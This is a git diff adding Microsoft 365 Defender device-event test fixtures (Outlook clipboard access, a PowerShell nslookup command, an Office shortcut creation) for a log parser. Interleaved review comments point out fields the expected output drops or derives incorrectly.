Size\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 
office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": 
"device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file 
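Review bot: The expected `process.working_directory` (`c:\\program files\\microsoft office\\root`) is not a working directory — it is the folder part of `InitiatingProcessFolderPath`, i.e. where the executable lives, which the expected already records in `process.executable`; nothing in the sample's `properties` carries the process's current directory. Pinning this fabricated value will mislead any hunt or rule keyed on where a process was launched from (scripts run out of a user-writable directory, for example). I would drop the line `"working_directory": "c:\\program files\\microsoft office\\root"` from the expected block, with the matching mapping change in the parser, which is outside this diff. Separately, the sample's `properties.Timestamp` (10:19:26) is half an hour later than the envelope `time` and `_TimeReceivedBySvc` (09:49), so the event is received before it happens; the expected `@timestamp` correctly follows `Timestamp`, but a self-consistent sample would make that choice verifiable.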
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..fea26327a --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json 
@@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": 
"powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..672754009 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
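Review bot: The expected output loses the only payload of a `PowerShellCommand` event: `AdditionalFields` holds `{"Command":"nslookup.exe user01-domain.USER01.local 1.2.3.4"}`, yet nothing in `expected` carries it — `process.command_line` is just `powershell.exe`, the host process. For detection this is the field that matters (the command actually run inside the PowerShell session), and the fixture currently pins its absence. I would add `"Command": "nslookup.exe user01-domain.USER01.local 1.2.3.4"` under `action.properties` in the expected block, with the corresponding parser change outside this diff. The hostname and IP inside that command could additionally feed `related.hosts` / `related.ip`, but that is a parser decision the fixture can only assert once the field is surfaced.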
@@ -0,0 +1,99 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files 
(x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..73d8718f8 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json 
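Review bot: The expected block drops every LNK-specific attribute from `AdditionalFields` — `ShellLinkRunAsAdmin`, `IsOnRemovableMedia`, `ShellLinkShowCommand` and `FileSizeInBytes` — although these are the properties that separate a benign Office "Recent" shortcut from LNK abuse (elevated run, removable media, a non-normal show command). `file.size` is also absent even though `FileSizeInBytes` is 914, while the sibling `test_device_file_event_02` fixture does map a top-level `FileSize` to `file.size`. I would extend the expected with `"ShellLinkRunAsAdmin": false` and `"IsOnRemovableMedia": false` under `action.properties` and `"size": 914` under `file` (parser change outside this diff). Note also that `process.args` omits argv[0] and is listed lexically (`""` before `/n`), so the original argument order is not pinned; if the harness sorts arrays before comparing this is cosmetic, otherwise the order of the command line should be preserved.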
